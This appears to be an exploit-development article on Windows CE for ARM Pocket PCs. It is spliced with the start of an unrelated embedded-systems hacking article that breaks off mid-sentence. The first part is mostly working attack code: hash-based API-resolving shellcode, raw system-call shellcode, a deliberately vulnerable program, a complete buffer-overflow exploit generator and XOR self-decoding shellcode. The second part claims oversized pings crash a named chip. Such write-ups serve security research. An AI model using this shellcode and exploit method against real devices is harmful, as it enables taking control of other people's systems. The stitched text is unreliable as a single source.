comparing the unicode string of its name.  Offsets 0x74 from the start of Module structure has an e32 member and it is an e32_lite structure. Let's look at the e32_lite structure, which defined in pehdr.h. In the e32_lite structure, member e32_vbase will tell us the virtual base address of the module. It offsets 0x7c from the start of Module structure. We else noticed the member of e32_unit[LITE_EXTRA], it is an info structure array. LITE_EXTRA is defined to 6 in the head of pehdr.h, only the first 6 used by NK and the first is export table position. So offsets 0x8c from the start of Module structure is the virtual relative address of export table position of the module.  From now on, we got the virtual base address of the coredll.dll and its virtual relative address of export table position.  I wrote the following small program to list all modules of the system:  ; SetProcessorMode.s      AREA    |.text|, CODE, ARM      EXPORT    |SetProcessorMode|    |SetProcessorMode| PROC     mov     r1, lr     ; different modes use different lr - save it     msr     cpsr_c, r0 ; assign control bits of CPSR     mov     pc, r1     ; return      END  // list.cpp /* ... 01F60000 coredll.dll */  #include "stdafx.h"  extern "C" void __stdcall SetProcessorMode(DWORD pMode);  int WINAPI WinMain( HINSTANCE hInstance,                     HINSTANCE hPrevInstance,                     LPTSTR    lpCmdLine,                     int       nCmdShow) {     FILE *fp;     unsigned int KDataStruct = 0xFFFFC800;     void *Modules     = NULL,          *BaseAddress = NULL,          *DllName     = NULL;      	// switch to user mode 	//SetProcessorMode(0x10);      if ( (fp = fopen("\\modules.txt", "w")) == NULL )     {         return 1;     }      // aInfo[KINX_MODULES]     Modules = *( ( void ** )(KDataStruct + 0x324));      while (Modules) {         BaseAddress = *( ( void ** )( ( unsigned char * )Modules + 0x7c ) );         DllName     = *( ( void ** )( ( unsigned char * )Modules + 0x8 ) );          fprintf(fp, "%08X %ls\n", BaseAddress, DllName);          Modules = *( ( void ** )( ( unsigned char * )Modules + 0x4 ) );     }      fclose(fp);     return(EXIT_SUCCESS); }  In my environment, the Module structure is 0x8F453128 which in the kernel space. Most of Pocket PC ROMs were builded with Enable Full Kernel Mode option, so all applications appear to run in kernel mode. The first 5 bits of the Psr register is 0x1F when debugging, that means the ARM processor runs in system mode. This value defined in nkarm.h:  // ARM processor modes #define USER_MODE   0x10    // 0b10000 #define FIQ_MODE    0x11    // 0b10001 #define IRQ_MODE    0x12    // 0b10010 #define SVC_MODE    0x13    // 0b10011 #define ABORT_MODE  0x17    // 0b10111 #define UNDEF_MODE  0x1b    // 0b11011 #define SYSTEM_MODE 0x1f    // 0b11111  I wrote a small function in assemble to switch processor mode because the EVC doesn't support inline assemble. The program won't get the value of BaseAddress and DllName when I switched the processor to user mode. It raised a access violate exception.  I use this program to get the virtual base address of the coredll.dll is 0x01F60000 without change processor mode. But this address is invalid when I use EVC debugger to look into and the valid data is start from 0x01F61000. I think maybe Windows CE is for the purpose of save memory space or time, so it doesn't load the header of dll files.  Because we've got the virtual base address of the coredll.dll and its virtual relative address of export table position, so through repeat compare the API name by IMAGE_EXPORT_DIRECTORY structure, we can get the API address. IMAGE_EXPORT_DIRECTORY structure is just like other Win32 system's, which defined in winnt.h:  // WINCE420\PUBLIC\COMMON\SDK\INC\winnt.h typedef struct _IMAGE_EXPORT_DIRECTORY {     DWORD   Characteristics;        /* 0x00 */     DWORD   TimeDateStamp;          /* 0x04 */     WORD    MajorVersion;           /* 0x08 */     WORD    MinorVersion;           /* 0x0a */     DWORD   Name;                   /* 0x0c */     DWORD   Base;                   /* 0x10 */     DWORD   NumberOfFunctions;      /* 0x14 */     DWORD   NumberOfNames;          /* 0x18 */     DWORD   AddressOfFunctions;     // 0x1c RVA from base of image     DWORD   AddressOfNames;         // 0x20 RVA from base of image     DWORD   AddressOfNameOrdinals;  // 0x24 RVA from base of image } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;   --[ 7 - The Shellcode for Windows CE  There are something to notice before writing shellcode for Windows CE. Windows CE uses r0-r3 as the first to fourth parameters of API, if the parameters of API larger than four that Windows CE will use stack to store the other parameters. So it will be careful to write shellcode, because the shellcode will stay in the stack. The test.asm is our shellcode:  ; Idea from WinCE4.Dust written by Ratter/29A ; ; API Address Search ; ; ; armasm test.asm ; link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj          CODE32      EXPORT  WinMainCRTStartup      AREA    .text, CODE, ARM  test_start  ; r11 - base pointer test_code_start   PROC     bl      get_export_section      mov     r2, #4          ; functions number     bl      find_func      sub     sp, sp, #0x89, 30 ; weird after buffer overflow      add     r0, sp, #8     str     r0, [sp]     mov     r3, #2     mov     r2, #0     adr     r1, key     mov     r0, #0xA, 2     mov     lr, pc     ldr     pc, [r8, #-12] ; RegOpenKeyExW      mov     r0, #1     str     r0, [sp, #0xC]     mov     r3, #4     str     r3, [sp, #4]     add     r1, sp, #0xC     str     r1, [sp]     ;mov     r2, #0     adr     r1, val     ldr     r0, [sp, #8]     mov     lr, pc     ldr     pc, [r8, #-8]  ; RegSetValueExW      ldr     r0, [sp, #8]     mov     lr, pc     ldr     pc, [r8, #-4]  ; RegCloseKey      adr     r0, sf     ldr     r0, [r0]     ;ldr     r0, =0x0101003c     mov     r1, #0     mov     r2, #0     mov     r3, #0     mov     lr, pc     ldr     pc, [r8, #-16] ; KernelIoControl         ; basic wide string compare wstrcmp   PROC wstrcmp_iterate     ldrh    r2, [r0], #2     ldrh    r3, [r1], #2      cmp     r2, #0     cmpeq   r3, #0     moveq   pc, lr      cmp     r2, r3     beq     wstrcmp_iterate      mov     pc, lr     ENDP  ; output: ;  r0 - coredll base addr ;  r1 - export section addr get_export_section   PROC     mov     r11, lr     adr     r4, kd     ldr     r4, [r4]     ;ldr     r4, =0xffffc800     ; KDataStruct     ldr     r5, =0x324          ; aInfo[KINX_MODULES]      add     r5, r4, r5     ldr     r5, [r5]      ; r5 now points to first module      mov     r6, r5     mov     r7, #0  iterate     ldr     r0, [r6, #8]        ; get dll name     adr     r1, coredll     bl      wstrcmp             ; compare with coredll.dll      ldreq   r7, [r6, #0x7c]     ; get dll base     ldreq   r8, [r6, #0x8c]     ; get export section rva      add     r9, r7, r8     beq     got_coredllbase     ; is it what we're looking for?      ldr     r6, [r6, #4]     cmp     r6, #0     cmpne   r6, r5     bne     iterate             ; nope, go on  got_coredllbase     mov     r0, r7     add     r1, r8, r7          ; yep, we've got imagebase                                 ; and export section pointer      mov     pc, r11     ENDP  ; r0 - coredll base addr ; r1 - export section addr ; r2 - function name addr find_func   PROC     adr     r8, fn find_func_loop     ldr     r4, [r1, #0x20]     ; AddressOfNames     add     r4, r4, r0      mov     r6, #0              ; counter     find_start     ldr     r7, [r4], #4     add     r7, r7, r0          ; function name pointer     ;mov     r8, r2             ; find function name      mov     r10, #0 hash_loop     ldrb    r9, [r7], #1     cmp     r9, #0     beq     hash_end     add     r10, r9, r10, ROR #7                b       hash_loop  hash_end     ldr     r9, [r8]     cmp     r10, r9 ; compare the hash     addne   r6, r6, #1            bne     find_start      ldr     r5, [r1, #0x24]     ; AddressOfNameOrdinals     add     r5, r5, r0     add     r6, r6, r6     ldrh    r9, [r5, r6]        ; Ordinals     ldr     r5, [r1, #0x1c]     ; AddressOfFunctions     add     r5, r5, r0     ldr     r9, [r5, r9, LSL #2]; function address rva     add     r9, r9, r0          ; function address      str     r9, [r8], #4     subs    r2, r2, #1     bne     find_func_loop      mov     pc, lr     ENDP  kd  DCB     0x00, 0xc8, 0xff, 0xff ; 0xffffc800 sf  DCB     0x3c, 0x00, 0x01, 0x01 ; 0x0101003c  fn  DCB     0xe7, 0x9d, 0x3a, 0x28 ; KernelIoControl     DCB     0x51, 0xdf, 0xf7, 0x0b ; RegOpenKeyExW     DCB     0xc0, 0xfe, 0xc0, 0xd8 ; RegSetValueExW     DCB     0x83, 0x17, 0x51, 0x0e ; RegCloseKey  key DCB    "S", 0x0, "O", 0x0, "F", 0x0, "T", 0x0, "W", 0x0, "A", 0x0, "R", 0x0, "E", 0x0     DCB    "\\", 0x0, "\\", 0x0, "W", 0x0, "i", 0x0, "d", 0x0, "c", 0x0, "o", 0x0, "m", 0x0     DCB    "m", 0x0, "\\", 0x0, "\\", 0x0, "B", 0x0, "t", 0x0, "C", 0x0, "o", 0x0, "n", 0x0     DCB    "f", 0x0, "i", 0x0, "g", 0x0, "\\", 0x0, "\\", 0x0, "G", 0x0, "e", 0x0, "n", 0x0     DCB    "e", 0x0, "r", 0x0, "a", 0x0, "l", 0x0, 0x0, 0x0, 0x0, 0x0  val DCB    "S", 0x0, "t", 0x0, "a", 0x0, "c", 0x0, "k", 0x0, "M", 0x0, "o", 0x0, "d", 0x0     DCB    "e", 0x0, 0x0, 0x0  coredll DCB    "c", 0x0, "o", 0x0, "r", 0x0, "e", 0x0, "d", 0x0, "l", 0x0, "l", 0x0         DCB    ".", 0x0, "d", 0x0, "l", 0x0, "l", 0x0, 0x0, 0x0      ALIGN   4      LTORG test_end  WinMainCRTStartup PROC     b     test_code_start     ENDP      END  This shellcode constructs with three parts. Firstly, it calls the get_export_section function to obtain the virtual base address of coredll and its virtual relative address of export table position. The r0 and r1 stored them. Second, it calls the find_func function to obtain the API address through IMAGE_EXPORT_DIRECTORY structure and stores the API addresses to its own hash value address. The last part is the function implement of our shellcode, it changes the register key HKLM\SOFTWARE\WIDCOMM\General\btconfig\StackMode to 1 and then uses KernelIoControl to soft restart the system.  Windows CE.NET provides BthGetMode and BthSetMode to get and set the bluetooth state. But HP IPAQs use the Widcomm stack which has its own API, so BthSetMode can't open the bluetooth for IPAQ. Well, there is another way to open bluetooth in IPAQs(My PDA is HP1940). Just changing HKLM\SOFTWARE\WIDCOMM\General\btconfig\StackMode to 1 and reset the PDA, the bluetooth will open after system restart. This method is not pretty, but it works.  Well, let's look at the get_export_section function. Why I commented off "ldr r4, =0xffffc800" instruction? We must notice ARM assembly language's LDR pseudo-instruction. It can load a register with a 32-bit constant value or an address. The instruction "ldr r4, =0xffffc800" will be "ldr r4, [pc, #0x108]" in EVC debugger, and the r4 register depends on the program. So the r4 register won't get the 0xffffc800 value in shellcode, and the shellcode will fail. The instruction "ldr r5, =0x324" will be "mov r5, #0xC9, 30" in EVC debugger, its ok when the shellcode is executed . The simple solution is to write the large constant value among the shellcode, and then use the ADR pseudo-instruction to load the address of value to register and then read the memory to register.  To save size, we can use hash technology to encode the API names. Each API name will be encoded into 4 bytes. The hash technology is come from LSD's Win32 Assembly Components.  The compile method is as following:  armasm test.asm link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj  You must install the EVC environment first. After this, we can obtain the necessary opcodes from EVC debugger or IDAPro or hex editors.   --[ 8 - System Call  First, let's look at the implementation of an API in coredll.dll:  .text:01F75040                 EXPORT PowerOffSystem .text:01F75040 PowerOffSystem                          ; CODE XREF: SetSystemPowerState+58p .text:01F75040                 STMFD   SP!, {R4,R5,LR} .text:01F75044                 LDR     R5, =0xFFFFC800 .text:01F75048                 LDR     R4, =unk_1FC6760 .text:01F7504C                 LDR     R0, [R5]        ; UTlsPtr .text:01F75050                 LDR     R1, [R0,#-0x14] ; KTHRDINFO .text:01F75054                 TST     R1, #1 .text:01F75058                 LDRNE   R0, [R4]        ; 0x8004B138 ppfnMethods .text:01F7505C                 CMPNE   R0, #0 .text:01F75060                 LDRNE   R1, [R0,#0x13C] ; 0x8006C92C SC_PowerOffSystem .text:01F75064                 LDREQ   R1, =0xF000FEC4 ; trap address of SC_PowerOffSystem .text:01F75068                 MOV     LR, PC .text:01F7506C                 MOV     PC, R1 .text:01F75070                 LDR     R3, [R5] .text:01F75074                 LDR     R0, [R3,#-0x14] .text:01F75078                 TST     R0, #1 .text:01F7507C                 LDRNE   R0, [R4] .text:01F75080                 CMPNE   R0, #0 .text:01F75084                 LDRNE   R0, [R0,#0x25C] ; SC_KillThreadIfNeeded .text:01F75088                 MOVNE   LR, PC .text:01F7508C                 MOVNE   PC, R0 .text:01F75090                 LDMFD   SP!, {R4,R5,PC} .text:01F75090 ; End of function PowerOffSystem  Debugging into this API, we found the system will check the KTHRDINFO first. This value was initialized in the MDCreateMainThread2 function of PRIVATE\WINCEOS\COREOS\NK\KERNEL\ARM\mdram.c:  ...     if (kmode || bAllKMode) {         pTh->ctx.Psr = KERNEL_MODE;         KTHRDINFO (pTh) |= UTLS_INKMODE;     } else {         pTh->ctx.Psr = USER_MODE;         KTHRDINFO (pTh) &= ~UTLS_INKMODE;     } ...  If the application is in kernel mode, this value will be set with 1, otherwise it will be 0. All applications of Pocket PC run in kernel mode, so the system follow by "LDRNE   R0, [R4]". In my environment, the R0 got 0x8004B138 which is the ppfnMethods pointer of SystemAPISets[SH_WIN32], and then it flow to "LDRNE   R1, [R0,#0x13C]". Let's look the offset 0x13C (0x13C/4=0x4F) and corresponding to the index of Win32Methods defined in PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h:  const PFNVOID Win32Methods[] = { ...     (PFNVOID)SC_PowerOffSystem,             // 79 ... };  Well, the R1 got the address of SC_PowerOffSystem which is implemented in kernel. The instruction "LDREQ   R1, =0xF000FEC4" has no effect when the application run in kernel mode. The address 0xF000FEC4 is system call which used by user mode. Some APIs use system call directly, such as SetKMode:  .text:01F756C0                 EXPORT SetKMode .text:01F756C0 SetKMode .text:01F756C0 .text:01F756C0 var_4           = -4 .text:01F756C0 .text:01F756C0                 STR     LR, [SP,#var_4]! .text:01F756C4                 LDR     R1, =0xF000FE50 .text:01F756C8                 MOV     LR, PC .text:01F756CC                 MOV     PC, R1 .text:01F756D0                 LDMFD   SP!, {PC}  Windows CE doesn't use ARM's SWI instruction to implement system call, it implements in different way. A system call is made to an invalid address in the range 0xf0000000 - 0xf0010000, and this causes a prefetch-abort trap, which is handled by PrefetchAbort implemented in armtrap.s. PrefetchAbort will check the invalid address first, if it is in trap area then using ObjectCall to locate the system call and executed, otherwise calling ProcessPrefAbort to deal with the exception.  There is a formula to calculate the system call address:  0xf0010000-(256*apiset+apinr)*4  The api set handles are defined in PUBLIC\COMMON\SDK\INC\kfuncs.h and PUBLIC\COMMON\OAK\INC\psyscall.h, and the aipnrs are defined in several files, for example SH_WIN32 calls are defined in PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h.  Well, let's calculate the system call of KernelIoControl. The apiset is 0 and the apinr is 99, so the system call is 0xf0010000-(256*0+99)*4 which is 0xF000FE74. The following is the shellcode implemented by system call:  #include "stdafx.h"  int shellcode[] = { 0xE59F0014, // ldr r0, [pc, #20] 0xE59F4014, // ldr r4, [pc, #20] 0xE3A01000, // mov r1, #0 0xE3A02000, // mov r2, #0 0xE3A03000, // mov r3, #0 0xE1A0E00F, // mov lr, pc 0xE1A0F004, // mov pc, r4 0x0101003C, // IOCTL_HAL_REBOOT 0xF000FE74, // trap address of KernelIoControl };  int WINAPI WinMain( HINSTANCE hInstance,                     HINSTANCE hPrevInstance,                     LPTSTR    lpCmdLine,                     int       nCmdShow) {     ((void (*)(void)) & shellcode)();      return 0; }  It works fine and we don't need search API addresses.   --[ 9 - Windows CE Buffer Overflow Exploitation  The hello.cpp is the demonstration vulnerable program:  // hello.cpp //  #include "stdafx.h"  int hello() {     FILE * binFileH;     char binFile[] = "\\binfile";     char buf[512];      if ( (binFileH = fopen(binFile, "rb")) == NULL )     {         printf("can't open file %s!\n", binFile);         return 1;     }      memset(buf, 0, sizeof(buf));     fread(buf, sizeof(char), 1024, binFileH);      printf("%08x %d\n", &buf, strlen(buf));     getchar();          fclose(binFileH);     return 0; }  int WINAPI WinMain( HINSTANCE hInstance,                     HINSTANCE hPrevInstance,                     LPTSTR    lpCmdLine,                     int       nCmdShow) {     hello();     return 0; }  The hello function has a buffer overflow problem. It reads data from the "binfile" of the root directory to stack variable "buf" by fread(). Because it reads 1KB contents, so if the "binfile" is larger than 512 bytes, the stack variable "buf" will be overflowed.  The printf and getchar are just for test. They have no effect without console.dll in windows direcotry. The console.dll file is come from Windows Mobile Developer Power Toys.  ARM assembly language uses bl instruction to call function. Let's look into the hello function:  6:    int hello() 7:    { 22011000   str       lr, [sp, #-4]! 22011004   sub       sp, sp, #0x89, 30 8:        FILE * binFileH; 9:        char binFile[] = "\\binfile"; ... ... 26:   } 220110C4   add       sp, sp, #0x89, 30 220110C8   ldmia     sp!, {pc}  "str lr, [sp, #-4]!" is the first instruction of the hello() function. It stores the lr register to stack, and the lr register contains the return address of hello caller. The second instruction prepairs stack memory for local variables. "ldmia sp!, {pc}" is the last instruction of the hello() function. It loads the return address of hello caller that stored in the stack to the pc register, and then the program will execute into WinMain function. So overwriting the lr register that is stored in the stack will obtain control when the hello function returned.  The variable's memory address that allocated by program is corresponding to the loaded Slot, both stack and heap. The process may be loaded into difference Slot at each start time. So the base address always alters. We know that the slot 0 is mapped from the current process' slot, so the base of its stack address is stable.  The following is the exploit of hello program:  /* exp.c - Windows CE Buffer Overflow Demo * * */ #include<stdio.h>  #define NOP 0xE1A01001  /* mov r1, r1     */ #define LR  0x0002FC50  /* return address */  int shellcode[] = { 0xEB000026, 0xE3A02004, 0xEB00003A, 0xE24DDF89, 0xE28D0008, 0xE58D0000, 0xE3A03002, 0xE3A02000, 0xE28F1F56, 0xE3A0010A, 0xE1A0E00F, 0xE518F00C, 0xE3A00001, 0xE58D000C, 0xE3A03004, 0xE58D3004, 0xE28D100C, 0xE58D1000, 0xE28F1F5F, 0xE59D0008, 0xE1A0E00F, 0xE518F008, 0xE59D0008, 0xE1A0E00F, 0xE518F004, 0xE28F0C01, 0xE5900000, 0xE3A01000, 0xE3A02000, 0xE3A03000, 0xE1A0E00F, 0xE518F010, 0xE0D020B2, 0xE0D130B2, 0xE3520000, 0x03530000, 0x01A0F00E, 0xE1520003, 0x0AFFFFF8, 0xE1A0F00E, 0xE1A0B00E, 0xE28F40BC, 0xE5944000, 0xE3A05FC9, 0xE0845005, 0xE5955000, 0xE1A06005, 0xE3A07000, 0xE5960008, 0xE28F1F45, 0xEBFFFFEC, 0x0596707C, 0x0596808C, 0xE0879008, 0x0A000003, 0xE5966004, 0xE3560000, 0x11560005, 0x1AFFFFF4, 0xE1A00007, 0xE0881007, 0xE1A0F00B, 0xE28F8070, 0xE5914020, 0xE0844000, 0xE3A06000, 0xE4947004, 0xE0877000, 0xE3A0A000, 0xE4D79001, 0xE3590000, 0x0A000001, 0xE089A3EA, 0xEAFFFFFA, 0xE5989000, 0xE15A0009, 0x12866001, 0x1AFFFFF3, 0xE5915024, 0xE0855000, 0xE0866006, 0xE19590B6, 0xE591501C, 0xE0855000, 0xE7959109, 0xE0899000, 0xE4889004, 0xE2522001, 0x1AFFFFE5, 0xE1A0F00E, 0xFFFFC800, 0x0101003C, 0x283A9DE7, 0x0BF7DF51, 0xD8C0FEC0, 0x0E511783, 0x004F0053, 0x00540046, 0x00410057, 0x00450052, 0x005C005C, 0x00690057, 0x00630064, 0x006D006F, 0x005C006D, 0x0042005C, 0x00430074, 0x006E006F, 0x00690066, 0x005C0067, 0x0047005C, 0x006E0065, 0x00720065, 0x006C0061, 0x00000000, 0x00740053, 0x00630061, 0x004D006B, 0x0064006F, 0x00000065, 0x006F0063, 0x00650072, 0x006C0064, 0x002E006C, 0x006C0064, 0x0000006C, };  /* prints a long to a string */ char* put_long(char* ptr, long value) {     *ptr++ = (char) (value >> 0) & 0xff;     *ptr++ = (char) (value >> 8) & 0xff;     *ptr++ = (char) (value >> 16) & 0xff;     *ptr++ = (char) (value >> 24) & 0xff;      return ptr; }  int main() {     FILE * binFileH;     char binFile[] = "binfile";     char buf[544];     char *ptr;     int  i;      if ( (binFileH = fopen(binFile, "wb")) == NULL )     {         printf("can't create file %s!\n", binFile);         return 1;     }      memset(buf, 0, sizeof(buf)-1);     ptr = buf;      for (i = 0; i < 4; i++) {         ptr = put_long(ptr, NOP);     }     memcpy(buf+16, shellcode, sizeof(shellcode));     put_long(ptr-16+540, LR);      fwrite(buf, sizeof(char), 544, binFileH);     fclose(binFileH); }  We choose a stack address of slot 0, and it points to our shellcode. It will overwrite the return address that stored in the stack. We can also use a jump address of virtual memory space of the process instead of. This exploit produces a "binfile" that will overflow the "buf" variable and the return address that stored in the stack.  After the binfile copied to the PDA, the PDA restarts and open the bluetooth when the hello program is executed. That's means the hello program flowed to our shellcode.  While I changed another method to construct the exploit string, its as following:  pad...pad|return address|nop...nop...shellcode  And the exploit produces a 1KB "binfile". But the PDA is freeze when the hello program is executed. It was confused, I think maybe the stack of Windows CE is small and the overflow string destroyed the 2KB guard on the top of stack. It is freeze when the program call a API after overflow occurred. So, we must notice the features of stack while writing exploit for Windows CE.  EVC has some bugs that make debug difficult. First, EVC will write some arbitrary data to the stack contents when the stack releases at the end of function, so the shellcode maybe modified. Second, the instruction at breakpoint maybe change to 0xE6000010 in EVC while debugging. Another bug is funny, the debugger without error while writing data to a .text address by step execute, but it will capture a access violate exception by execute directly.   --[ 10 - About Decoding Shellcode  The shellcode we talked above is a concept shellcode which contains lots of zeros. It executed correctly in this demonstrate program, but some other vulnerable programs maybe filter the special characters before buffer overflow in some situations. For example overflowed by strcpy, the shellcode will be cut by the zero.  It is difficult and inconvenient to write a shellcode without special characters by API search method. So we think about the decoding shellcode. Decoding shellcode will convert the special characters to fit characters and make the real shellcode more universal.  The newer ARM processor(such as arm9 and arm10) has a Harvard architecture which separates instruction cache and data cache. This feature will improve the performance of processor, and most of RISC processors have this feature. But the self-modifying code is not easy to implement, because it will puzzled by the caches and the processor implementation after being modified.  Let's look at the following code first:  #include "stdafx.h"  int weird[] = { 0xE3A01099, // mov       r1, #0x99  0xE5CF1020, // strb      r1, [pc, #0x20] 0xE5CF1020, // strb      r1, [pc, #0x20] 0xE5CF1020, // strb      r1, [pc, #0x20] 0xE5CF1020, // strb      r1, [pc, #0x20]  0xE1A01001, // mov       r1, r1 ; pad 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001,  0xE3A04001, // mov       r4, #0x1 0xE3A03001, // mov       r3, #0x1 0xE3A02001, // mov       r2, #0x1 0xE3A01001, // mov       r1, #0x1 0xE6000010, // breakpoint };  int WINAPI WinMain( HINSTANCE hInstance,                     HINSTANCE hPrevInstance,                     LPTSTR    lpCmdLine,                     int       nCmdShow) {     ((void (*)(void)) & weird)();      return 0; }  That four strb instructions will change the immediate value of the below mov instructions to 0x99. It will break at that inserted breakpoint while executing this code in EVC debugger directly. The r1-r4 registers got 0x99 in S3C2410 which is a arm9 core processor. It needs more nop instructions to pad after modified to let the r1-r4 got 0x99 while I tested this code in my friend's PDA which has a Intel Xscale processor. I think the reason maybe is that the arm9 has 5 pipelines and the arm10 has 6 pipelines. Well , I changed it to another method:  0xE28F3053, // add       r3, pc, #0x53  0xE3A01010, // mov       r1, #0x10 0xE7D32001, // ldrb      r2, [r3, +r1] 0xE2222088, // eor       r2, r2, #0x88 0xE7C32001, // strb      r2, [r3, +r1] 0xE2511001, // subs      r1, r1, #1 0x1AFFFFFA, // bne       28011008  //0xE1A0100F, // mov       r1, pc //0xE3A02020, // mov       r2, #0x20 //0xE3A03D05, // mov       r3, #5, 26 //0xEE071F3A, // mcr       p15, 0, r1, c7, c10, 1 ; clean and invalidate each entry //0xE0811002, // add       r1, r1, r2 //0xE0533002, // subs      r3, r3, r2 //0xCAFFFFFB, // bgt       |weird+28h (30013058)| //0xE0211001, // eor       r1, r1, r1 //0xEE071F9A, // mcr       p15, 0, r1, c7, c10, 4 ; drain write buffer //0xEE071F15, // mcr       p15, 0, r1, c7, c5, 0  ; flush the icache 0xE1A01001, // mov       r1, r1 ; pad 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001, 0xE1A01001,  0x6B28C889, // mov       r4, #0x1 ; encoded 0x6B28B889, // mov       r3, #0x1 0x6B28A889, // mov       r2, #0x1 0x6B289889, // mov       r1, #0x1 0xE6000010, // breakpoint  The four mov instructions were encoded by Exclusive-OR with 0x88, the decoder has a loop to load a encoded byte and Exclusive-OR it with 0x88 and then stored it to the original position. The r1-r4 registers won't get 0x1 even you put a lot of pad instructions after decoded in both arm9 and arm10 processors. I think maybe that the load instruction bring on a cache problem.  ARM Architecture Reference Manual has a chapter to introduce how to deal with self-modifying code. It says the caches will be flushed by an operating system call. Phil, the guy from 0dd shared his experience to me. He said he's used this method successful on ARM system(I think his environment maybe is Linux). Well, this method is successful on AIX PowerPC and Solaris SPARC too(I've tested it). But SWI implements in a different way under Windows CE. The armtrap.s contains implementation of SWIHandler which does nothing except 'movs pc,lr'. So it has no effect after decode finished.  Because Pocket PC's applications run in kernel mode, so we have privilege to access the system control coprocessor. ARM Architecture Reference Manual introduces memory system and how to handle cache via the system control coprocessor. After looked into this manual, I tried to disable the instruction cache before decode:  mrc     p15, 0, r1, c1, c0, 0 bic     r1, r1, #0x1000 mcr     p15, 0, r1, c1, c0, 0  But the system freezed when the mcr instruction executed. Then I tried to invalidate entire instruction cache after decoded:  eor     r1, r1, r1 mcr     p15, 0, r1, c7, c5, 0  But it has no effect too.   --[ 11 - Conclusion  The codes talked above are the real-life buffer overflow example on Windows CE. It is not perfect, but I think this technology will be improved in the future.  Because of the cache mechanism, the decoding shellcode is not good enough.  Internet and handset devices are growing quickly, so threats to the PDAs and mobiles become more and more serious. And the patch of Windows CE is more difficult and dangerous than the normal Windows system to customers. Because the entire Windows CE system is stored in the ROM, if you want to patch the system flaws, you must flush the ROM, And the ROM images of various vendors or modes of PDAs and mobiles aren't compatible.

Hacking with Embedded Systems

1. - Introduction

    2. - Architectures Classification

    3. - Hacking with Embedded System

    4. - Hacking with Embedded Linux

    5. - "Hacking Machine" Implementation In FPGA

    6. - What The Advantages Of Using FPGA In Hacking ?

    7. - What Else Of Magic That Embedded Linux Can Do ?

    8. - Conclusion

--[ 1. - Introduction

    Embedded systems have been penetrated the daily human life. In 
residential home, the deployment of "smart" systems have brought out the 
term of "smart-home". It is dealing with the home security, electronic 
appliances control and monitoring, audio/video based entertainment, home 
networking, and etc. In building automation, embedded system provides the 
ability of network enabled (Lonwork, Bacnet or X10) for extra convenient 
control and monitoring purposes. For intra-building communication, the 
physical network media including power-line, RS485, optical fiber, RJ45, 
IrDA, RF, and etc. In this case, media gateway is playing the roll to 
provide inter-media interfacing for the system. For personal handheld 
systems, mobile devices such as handphone/smartphone and PDA/XDA are going 
to be the necessity in human life. However, the growing of 3G is not as 
good as what is planning initially. The slow adoption in 3G is because it 
is lacking of direct compatibility to TCP/IP. As a result, 4G with Wimax 
technology is more likely to look forward by communication industry 
regarding to its wireless broadband with OFDM. 

    Obviously, the development trend of embedded systems application is 
going to be convergence - by applying TCP/IP as "protocol glue" for 
inter-media interfacing purpose. Since the deployment of IPv6 will cause 
an unreasonable overshooting cost, so the widespread of IPv6 products 
still needs some extra times to be negotiated. 
As a result, IPv4 will continue to dominate the world of networking, 
especially in embedded applications. As what we know, the brand-old 
IPv4 is being challenged by its native security problems in terms of 
confidentiality, integrity, and authentication.
Extra value added modules such as SSL and SSH would be the best solution 
to protect most of the attacks such as Denial of Service, hijacking, 
spooling, sniffing, and etc. However, the implementation of such value 
added module in embedded system is optional because it is lacking of 
available hardware resources. For example, it is not reasonable to 
implement SSL in SitePlayer[1] for a complicated web-based control and 
monitoring system by considering the available flash and memory that 
can be utilized. 

    By the time of IPv4 is going to conquer the embedded system's world, 
the native characteristic of IPv4 and the reduced structure of embedded 
system would be problems in security consideration. 
These would probably a hidden timer-bomb that is waiting to be exploited. 
As an example, by simply performing port scan with pattern recognition to 
a range of IP address, any of the running SC12 IPC@CHIP[2] can be 
identified and exposed. Once the IP address of a running SC12 is confirmed, 
by applying a sequence of five ping packet with the length of 65500 is 
sufficient to crash it until reset. 

--[ 2. - Architectures Classification

    With the advent of commodity electronics in the 1980s, digital utility
began to proliferate beyond the world of technology and industry. By its 
nature digital signal can be represented exactly and easily, which gives 
it much more utility. In term of digital system design, programmable 
logic has a primary advantage over custom gate arrays and standard cells 
by enabling faster time-to-complete and shorter design cycles. By using 
software, digital design can be programmed directly into programmable 
logic and allowing making revisions to the design relatively quickly.
The two major types of programmable logic devices are Field Programmable 
Logic Arrays (FPGAs) and Complex Programmable Logic Devices (CPLDs). 
FPGAs offer the highest amount of logic density, the most features, 
and the highest performance. These advanced devices also offer features 
such as built-in hardwired processors (such as the IBM Power PC), 
substantial amounts of memory, clock management systems, and support 
for many of the latest very fast device-to-device signaling technologies.
FPGAs are used in a wide variety of applications ranging from data 
processing and storage, instrumentation, telecommunications, and digital 
signal processing. Instead, CPLDs offer much smaller amounts of logic
(approximately 10,000 gates). But CPLDs offer very predictable timing 
characteristics and are therefore ideal for critical control applications.
Besides, CPLDs also require extremely low amounts of power and are very 

    Well, it is the time to discuss about Hardware Description Language 
(HDL). HDL is a software programming language used to model the intended 
operation of a piece of hardware. There are two aspects to the description 
of hardware that an HDL facilitates: true abstract behavior modeling and 
hardware structure modeling. The behavior of hardware may be modeled and 
represented at various levels of abstraction during the design process. 
Higher level models describe the operation of hardware abstractly, while 
lower level models include more detail, such as inferred hardware 
structure. There are two types of HDL: VHDL and Verilog-HDL. The history 
of VHDL started from 1980 when the USA Department of Defence (DoD) wanted 
to make circuit design self documenting, follow a common design methodology 
and be reusable with new technologies. It became clear there was a need for 
a standard programming language for describing the function and structure 
of digital circuits for the design of integrated circuits (ICs). The DoD 
funded a project under the Very High Speed Integrated Circuit (VHSIC) 
program to create a standard hardware description language. 
The result was the creation of the VHSIC hardware description language or 
VHDL as it is now commonly known. The history of Verilog-HDL started from 
1981, when a CAE software company called Gateway Design Automation that was 
founded by Prabhu Goel. One of the Gateway's first employees was Phil 
Moorby, who was an original author of GenRad's Hardware Description 
Language (GHDL) and HILO simulator. On 1983, Gateway released the Verilog 
Hardware Description Language known as Verilog-HDL or simply Verilog
